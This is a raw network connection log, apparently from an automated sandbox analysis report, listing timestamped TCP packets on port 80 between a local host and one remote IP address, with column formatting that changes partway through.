Nov 24, 2024 08:14:02.567608118 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838325024 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838402033 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838454008 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838490009 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838502884 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.838521957 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838543892 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.838562012 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838598013 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838624954 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.838633060 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838668108 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838680029 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.838705063 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.838743925 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.958226919 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.958323002 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.958421946 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.962402105 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.962475061 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:03.962524891 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:03.964477062 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.039417028 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.039463997 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.039537907 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.039585114 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.043528080 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.043590069 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.043627024 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.043678045 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.051841021 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.051919937 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.054929972 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.054987907 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.055044889 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.055099964 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.063365936 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.063427925 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.063457012 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.063505888 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.071819067 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.071856022 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.071885109 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.071922064 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.080125093 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.080183983 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.080214024 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.080261946 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.088551044 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.088622093 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.088627100 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.088674068 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.096993923 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.097053051 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.097086906 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:04.097135067 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:04.983694077 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:05.103449106 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:05.103579998 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:05.118554115 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:05.239289999 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:05.239603043 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.620698929 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.686919928 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.686948061 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.686960936 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.686980009 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687017918 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687017918 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687227964 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687252045 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687263012 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687263966 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687284946 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687303066 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687391043 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687405109 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687432051 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687433004 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687447071 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687460899 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.687710047 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.687743902 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:06.780818939 CET | 80 | 49897 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:06.780921936 CET | 49897 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:07.639875889 CET | 49904 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:07.759361029 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:07.759507895 CET | 49904 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:07.769908905 CET | 49904 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:07.889484882 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.109932899 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.109970093 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.109989882 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.110146046 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.110171080 CET | 49904 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:09.110198975 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.110204935 CET | 49904 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:09.110213041 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.110250950 CET | 49904 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:09.110460997 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:09.110474110 CET | 80 | 49904 | 31.31.196.177 | 192.168.2.10
                                                            Nov 24, 2024 08:14:09.110486031 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110502958 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.110893011 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110934973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.229722023 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.229811907 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.229959965 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.233867884 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.233927011 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.234020948 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.301805973 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.301898003 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.302182913 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.305959940 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.306068897 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.306221008 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.314347982 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.317409039 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.317490101 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.317502975 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.325800896 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.325856924 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.325937986 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.334146023 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.334245920 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.334260941 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.342566967 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.342679977 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.342804909 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.351217985 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.351290941 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.351339102 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.359272003 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.359280109 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.359539986 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.367702961 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.367754936 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.367831945 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.376061916 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.376133919 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.376158953 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.383945942 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.384006023 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.384047985 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.433152914 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.493618965 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.493678093 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.493926048 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.497857094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.497864008 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.497885942 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.498013973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.501646996 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.501703024 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.501756907 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.506407022 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.506481886 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.506494999 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.511189938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.511326075 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.511353970 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.515963078 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.516042948 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.516199112 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.520708084 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.520802021 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.520804882 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.525501966 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.525571108 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.525588989 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.530301094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.530363083 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.530500889 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.535058022 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.535118103 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.535145044 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.539901972 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.540011883 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.540047884 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.544631004 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.544708014 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.544732094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.549343109 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.549426079 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.549472094 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.554121971 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.554212093 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.554214001 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.558896065 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.558985949 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.559043884 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.563831091 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.563848972 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.563994884 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.568506956 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.568592072 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.568661928 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.573287964 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.573353052 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.573513985 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.578067064 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.578233957 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.578268051 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.582799911 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.582896948 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.582917929 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.587644100 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.587713003 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.587728024 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.592344046 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.592442036 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.592535973 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.597152948 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.597210884 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.597253084 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.651876926 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.685503960 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.685550928 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.685697079 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.687505960 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.687618971 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.687815905 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.691210032 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.692624092 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.692673922 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.692702055 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.696440935 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.696502924 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.696540117 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.700195074 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.700316906 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.700367928 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.704030037 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.704123020 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.704144955 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.707726002 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.707842112 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.707839966 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.711309910 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.711390018 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.711432934 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.714747906 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.714855909 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.715039015 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.718183994 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.718266964 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.718275070 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.721570015 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.721661091 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.721697092 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.724873066 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.724953890 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.724992037 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.728106022 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.728219986 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.728256941 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.731414080 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.731519938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.731549025 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.734622002 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.734711885 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.734735012 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.737911940 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.738008022 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.738032103 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.741090059 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.741173983 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.741182089 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.744349003 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.744436026 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.744565964 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.747551918 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.747628927 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.747669935 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.750797987 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.750874043 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.750899076 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.754049063 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.754132986 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.754151106 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.757306099 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.757380962 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.757488966 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.760539055 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.760641098 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.760658026 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.763803005 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.763916016 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.763952017 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.767026901 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.767102957 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.767123938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.770256996 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.770344973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.770386934 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.773494959 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.773629904 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.773715973 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.776776075 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.776864052 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.776876926 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.780018091 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.780121088 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.780136108 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.783262968 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.783320904 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.783344030 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.786488056 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.786587954 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.786598921 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.789747953 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.789805889 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.789844990 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.792953014 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.793025017 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.793061018 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.796214104 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.796274900 CET4990480192.168.2.1031.31.196.177
Nov 24, 2024 08:14:09.796312094 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.799473047 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.799542904 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.799561977 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.802685976 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.802774906 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.802797079 CET  80     49904  31.31.196.177   192.168.2.10
